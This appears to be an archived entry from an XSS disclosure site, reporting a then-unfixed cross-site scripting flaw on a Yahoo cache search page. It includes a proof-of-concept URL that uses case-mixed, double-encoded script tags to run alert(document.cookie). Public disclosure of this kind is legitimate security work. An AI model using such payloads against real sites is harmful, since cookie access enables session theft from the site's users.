Security researcher kInGoFcHaOs, has submitted on 31/08/2008 a cross-site-scripting (XSS) vulnerability affecting cache.search.yahoo.net, which at the time of submission ranked 1 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 31/08/2008. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 31/08/2008 | 
Date published: 31/08/2008 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: kInGoFcHaOs | 
Domain: cache.search.yahoo.net | 
Category: XSS | 
Pagerank: 1 | 
 
 
 
URL: http://cache.search.yahoo.net/search/cache?ei=UTF-8&p=%3C%22%3C%3C%22%3C%3CsCrIPT%3Ealert(document.c ookie)%3C%2FsCrIpT%3E&u=www.last.fm/music/%25253Cscript%25253Ealert%252528document.cookie%252529%252 53B%25253C%25252Fscript%25253E&w=script+alert+document+cookie+script&d=Yn3rShg5RVoN&icp=1&.intl=us | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |